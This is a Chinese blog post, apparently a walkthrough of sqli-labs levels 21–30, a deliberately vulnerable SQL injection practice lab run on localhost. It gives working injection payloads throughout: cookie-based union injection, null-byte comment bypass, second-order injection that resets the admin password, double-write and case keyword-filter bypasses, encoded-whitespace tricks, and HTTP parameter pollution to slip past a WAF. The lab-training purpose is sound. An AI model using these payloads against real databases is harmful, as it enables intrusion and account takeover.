sql 注入 21-30

最新推荐文章于 2024-09-10 14:35:22 发布
最新推荐文章于 2024-09-10 14:35:22 发布
阅读量2.3k 收藏
点赞数
分类专栏: SQL 文章标签: sql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62420492/article/details/122145734
版权

Less-21

  1. 先登录 admin admin
  2. 登陆成功后,使用cookie editor 查看cookie
  3. 解密cookie 发现是admin
  4. 将**’) union select 1,2,database()#**加密后输入
  5. 剩余步骤正常注入在这里插入图片描述

Less-22

同Less-21的区别是 ” union select 1,2,database()#
在这里插入图片描述

剩余步骤正常注入

Less-23

http://127.0.0.1/sqli/Less-23/?id=1//显示的有信息

在这里插入图片描述

http://127.0.0.1/sqli/Less-23/?id=1'//此时显示报错

在这里插入图片描述
出现报错

http://127.0.0.1/sqli/Less-23/?id=1'--+//此时无法正常闭合

在这里插入图片描述
查看源码在这里插入图片描述
将# --+ 均进行了替换,替换为空格
%00通过这个注释进行注释

http://127.0.0.1/sqli/Less-23/?id=1';%00

剩余步骤正常注入

http://127.0.0.1/sqli/Less-23/?id=11111' union select 1,2, 3;%00

Less-24

  1. 首先查询目前的user信息,找到admin的密码
  2. 用admin’# 注册一个账号,再登陆
  3. 修改admin 的密码
  4. SQL语句:
UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass'
UPDATE users SET PASSWORD='123456' where username='admin'#' and password='$curr_pass'
UPDATE users SET PASSWORD='123456' where username='admin'

Less-25

http://127.0.0.1/sqli/Less-25/?id=1'//有报错信息
http://127.0.0.1/sqli/Less-25/?id=1'--+//尝试闭合,发现返回正常

在这里插入图片描述

http://127.0.0.1/sqli/Less-25/?id=1' order by 2--+//有报错

在这里插入图片描述
在这里插入图片描述
or 消失,查看源码
在这里插入图片描述

http://127.0.0.1/sqli/Less-25/?id=1' OorRder by 2--+//双写绕过

在这里插入图片描述
在MYSQL中对于大小写并不敏感

http://127.0.0.1/sqli/Less-25/?id=1' union select 1,2,3--+//无回显位置
http://127.0.0.1/sqli/Less-25/?id=1112' union select 1,2,3--+//有回显信息

在这里插入图片描述
在这里插入图片描述

http://127.0.0.1/sqli/Less-25/?id=1112' union select 1,2,group_concat(schema_name) from infoorrmation_schema.schemata--+//双写绕过

Less-25a

查看源码
在这里插入图片描述
在这里插入图片描述
无包裹

Less-26
查看源码
在这里插入图片描述
双引号不报错,单引号报错,说明应该使用单引号闭合
在这里插入图片描述
对于空格和and 都过滤
对于and 可以进行双写绕过,对于空格可以使用url编码绕过
%09 Tab键(水平)
%0a 新建一行
%0c 新的一页
%0d return 键
%0b Tab键(垂直)
%a0 空格
() 绕过

Less-26a

在这里插入图片描述
使用 ')即可

Less-27

查看源码
在这里插入图片描述
发现过滤了union select ,可以使用大小写绕过
%0A可以当作括号

Less-27a

在这里插入图片描述
这里将报错关了,语句由上一关的单引号,变成了无单引号,经过测试,可以通过双引号进行闭合
其余同上一关

Less-28

在这里插入图片描述
匹配了union select 还有select ,其余和上面相同
双写绕过即可

Less-28a

在这里插入图片描述
查看源码,发现只过滤了union select 其余的过滤全都放开了

Less-29

基于WAF的一个错误
HTTP参数污染,攻击者通过在HTTP请求中插入特定的参数来发起攻击,如果Web应用中存在这样的漏洞,可以被攻击者来进行客户端或者服务器端的攻击
WAT服务器只解析重复参数里面的前者,而真正的Web 服务器(Apache)只解析重复参数里面的后者,我们可以传入两个id参数,前者合法而后者为我们想注入的内容
我们的后端是Apache ,所以我们是只要将参数放在后面即可
在这里插入图片描述

Less-30

在这里插入图片描述
同上一关的方法,只是这关换成了双引号

小杨想睡觉.
关注
专栏目录
sql注入21-27关
qq_45751902的博客
04-01 3086
21关 经过这两个可知,有加密,在网上找大佬的解法说,使用了base64加密 解密后 base64编解码地址: https://tool.oschina.net/encrypt?type=3 可以推出,我们需要在burp suite上将编码后的内容输入 ') and updatexml(1,concat(0x7e,database(),0x7e),1)# ') union select 1,2, updatexml(1,concat(0x7e,database(),0x7e),1)# 同时因为有回
SQL注入
小勇的博客
06-12 1665
使用UNION进一步注入:union select(Oracle使用union select null,null代替1,2)当列数目不对时,会有错误提示 使用order by语句,当order by的列<=SQL语句的列数目的时候,查询正常. 手工注入一:使用union select查询,查看新增内容,从下图可以看出,列2的内容是可以被输出到页面上的,所以下面的查询我们都将使用列2 查询数据库信息,
sql-labs 闯关 21~25
qq_44663230的博客
08-29 1364
sql-labs 闯关21~25
SQL注入-02-注入步骤
xhxtalent的博客
11-24 1650
SQL注入的攻击步骤: 1、确认注入攻击目标网站 2、目标网站的一般信息的收集、分析与提取 3、网站技术分析:寻找和测试可用注入点,网页输入输出机制分析 4、探子回报:注入SQL确定数据库类型,当前账户权限级别 5、提权分析:根据用户级别确定是否可以与系统层交互提权,是否可以与数据库层交互提权,是否可以获取web后台管理员权限的可能性 6、网站可用SQL注入类型测试,盲注?显注? 7、盲注策略:使用注入分析工具替代人工 ​ 显注策略:第三者上位 攻击的准备–信息收集与分析 1.信念: 没有无用的信息 黑
sql注入
m0_66618018的博客
10-25 615
SQL手工注入
SQL注入天书-ASP注入漏洞全接触.pdf
07-09
SQL注入天书-ASP注入漏洞全接触》是一本深入探讨SQL注入攻击的书籍,主要针对ASP编程环境下的漏洞利用。SQL注入是一种常见的网络安全威胁,它利用了开发者在编写Web应用程序时对用户输入数据处理不当的缺陷。通过...
SQL注入工具-御剑
06-07
【描述】:“SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑” 描述中的重复部分强调了御剑作为SQL注入工具的核心属性。SQL注入是黑客通过构造恶意的SQL语句...
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
sql注入实例--安全等级
12-26
使用WebGoat,根据提示信息 ,完成包括Injection Flaw大类下的String SQL注入,Numeric SQL注入,Log Spoofing,XPATH Injection等安全弱点的攻击测试。
网络安全-sql注入实战-sql-labs(1~10)
09-02
网络安全-sql注入实战-sql-labs(1~10)
萌新学习sql注入0
bmth666的博客
02-26 268
萌新学习ctf记录,从入门到入土
Sqli-labs之Less-28和Less-28a
→_→
04-27 1417
Less-28 基于错误的,单引号字符型,过滤了union和select等的注入 判断注入类型 1和1"正常回显,1'报错,单引号字符型。2'%26%26'1'='1回显为id=1,有小括号。 参看源码: 发现没有过滤or与and。 过滤了相...
sqlilabs less-28~less-28a
TA不懒,但还没有添加简介
07-22 740
sqlilabs less-28~less-8a
SQL注入回顾篇(一)
JBlock的博客
02-28 1642
前言 忆往昔,峥嵘岁月稠!大学已经到了大三了,打了很多比赛,回顾还是挺欣慰!此系列来由是想留一点东西,把所学知识整理一下,同时也是受github上Micro8分享的启发,故想做一些工作,以留后人参考,历时两个星期,第一系列SQL注入回顾篇出炉!内容分四节发布,其中SQL注入代码审计为两节,WAF绕过总结为1节,SQLMAP使用总结为1节!此为SQL注入代码审计第一部分。欢迎各位斧正,交流! 文章目...
SQL注入姿势
cyjmosthandsome的博客
03-02 608
一、双等号绕过 例题:http://ctf5.shiyanbar.com/web/wonderkun/web/index.html(登陆一下好吗) payload:username=a'='&amp;password=a'=' username=a'='0&amp;password=a'='0 解析: 后端PHP代码应该为:select ** fro...
pandas读取xlsx文件使用sqlachemy写到数据库
最新发布
ithongchou的博客
09-10 533
如果你使用的是特定的数据库(如 SQLite、PostgreSQL、MySQL),你还需要安装相应的数据库驱动。通过这些步骤,你可以方便地将 Excel 文件中的数据写入数据库。连接字符串的格式取决于你使用的数据库。(用于读取 Excel 文件)。方法将 DataFrame 数据写入数据库。读取 Excel 文件。
sql注入sql-labs
09-12
Sql注入sqli-labs是一个提供了各种不同难度级别的SQL注入漏洞练习的实验环境。要访问sqli-labs,你可以通过打开网站管理界面->打开sqli-labs来直接进入。点击第一行的"Setup/reset Database for labs"可以看到各个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值